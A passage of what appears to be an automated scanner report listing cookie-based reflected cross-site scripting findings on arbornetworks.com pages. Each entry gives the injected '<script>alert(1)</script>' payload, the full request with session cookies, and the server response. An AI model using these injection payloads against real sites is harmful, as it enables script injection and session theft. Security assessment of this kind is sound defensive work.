Cookie: mbfcookie[lang]=en4ad11"><script>alert(1)</script>45c595a351a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2f90ebf3f79c56732a249f6b42e46a68; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:00 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:00 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:55:01 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en4ad11\"><script>alert(1)</script>45c595a351a">
...[SNIP]...

2.129. http://www.arbornetworks.com/en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0de3"><script>alert(1)</script>c78fdd82d6c was submitted in the mbfcookie[lang] cookie. This input was echoed as e0de3\"><script>alert(1)</script>c78fdd82d6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene0de3"><script>alert(1)</script>c78fdd82d6c; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=27009310fb8993a60206523b612c1753; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:08 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:08 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:09 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:09 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene0de3\"><script>alert(1)</script>c78fdd82d6c">
...[SNIP]...

2.130. http://www.arbornetworks.com/en/arbor-in-action-global-network-security-solution-resources.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-in-action-global-network-security-solution-resources.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61438"><script>alert(1)</script>bf6eef2e4a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as 61438\"><script>alert(1)</script>bf6eef2e4a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en61438"><script>alert(1)</script>bf6eef2e4a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d3554e8c89ab697c33ada74e025444df; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:16 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:16 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:17 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en61438\"><script>alert(1)</script>bf6eef2e4a3">
...[SNIP]...

2.131. http://www.arbornetworks.com/en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2791d"><script>alert(1)</script>a9d0e26d8e0 was submitted in the mbfcookie[lang] cookie. This input was echoed as 2791d\"><script>alert(1)</script>a9d0e26d8e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en2791d"><script>alert(1)</script>a9d0e26d8e0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=393079ea34c82ec326ef11037b6f5423; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:57 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:57 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:58 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en2791d\"><script>alert(1)</script>a9d0e26d8e0">
...[SNIP]...

2.132. http://www.arbornetworks.com/en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d75d"><script>alert(1)</script>8224aca7549 was submitted in the mbfcookie[lang] cookie. This input was echoed as 3d75d\"><script>alert(1)</script>8224aca7549 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en3d75d"><script>alert(1)</script>8224aca7549; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2926e27934b597acfb84a5a477897674; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:54 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:54 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:55 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en3d75d\"><script>alert(1)</script>8224aca7549">
...[SNIP]...

2.133. http://www.arbornetworks.com/en/asert-arbor-security-engineering-response-team-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/asert-arbor-security-engineering-response-team-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e43ff"><script>alert(1)</script>b793ea52c1b was submitted in the mbfcookie[lang] cookie. This input was echoed as e43ff\"><script>alert(1)</script>b793ea52c1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene43ff"><script>alert(1)</script>b793ea52c1b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=564a9f15ff3e6e27cb466251245f4c93; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:41 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:41 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:42 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:52:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene43ff\"><script>alert(1)</script>b793ea52c1b">
...[SNIP]...

2.134. http://www.arbornetworks.com/en/atlas-global-network-threat-analysis-460.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/atlas-global-network-threat-analysis-460.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ae"><script>alert(1)</script>00ecfe4a1d9 was submitted in the mbfcookie[lang] cookie. This input was echoed as 804ae\"><script>alert(1)</script>00ecfe4a1d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en804ae"><script>alert(1)</script>00ecfe4a1d9; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=15aac11375f31ae52e77accbda94e455; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:46 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en804ae\"><script>alert(1)</script>00ecfe4a1d9">
...[SNIP]...

2.135. http://www.arbornetworks.com/en/channel-partners-3.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/channel-partners-3.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a0c4"><script>alert(1)</script>58c339d6161 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1a0c4\"><script>alert(1)</script>58c339d6161 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/channel-partners-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1a0c4"><script>alert(1)</script>58c339d6161; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=12b1b857bef65e5f6a00e6c0acbfe617; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:20 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:20 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:21 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en1a0c4\"><script>alert(1)</script>58c339d6161">
...[SNIP]...

2.136. http://www.arbornetworks.com/en/com-5fcontent/view-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/com-5fcontent/view-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b69"><script>alert(1)</script>158d46c471b was submitted in the mbfcookie[lang] cookie. This input was echoed as 90b69\"><script>alert(1)</script>158d46c471b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/com-5fcontent/view-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en90b69"><script>alert(1)</script>158d46c471b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1eee34dce72c206720e7174b964eaccf; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:03 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:03 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:04 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en90b69\"><script>alert(1)</script>158d46c471b">
...[SNIP]...

2.137. http://www.arbornetworks.com/en/com-5fcontent/view-3.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/com-5fcontent/view-3.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bb"><script>alert(1)</script>910074bfd64 was submitted in the mbfcookie[lang] cookie. This input was echoed as dc0bb\"><script>alert(1)</script>910074bfd64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/com-5fcontent/view-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=endc0bb"><script>alert(1)</script>910074bfd64; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d0846fcdd6654ed6ae07863593536390; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:22 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:22 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:23 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="endc0bb\"><script>alert(1)</script>910074bfd64">
...[SNIP]...

2.138. http://www.arbornetworks.com/en/contact-us-4.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us-4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa46"><script>alert(1)</script>3a748a1b21e was submitted in the mbfcookie[lang] cookie. This input was echoed as bfa46\"><script>alert(1)</script>3a748a1b21e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/contact-us-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbfa46"><script>alert(1)</script>3a748a1b21e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9ffb7b2b334dc66c05bfc0e48191fee6; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:20 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:20 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:21 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


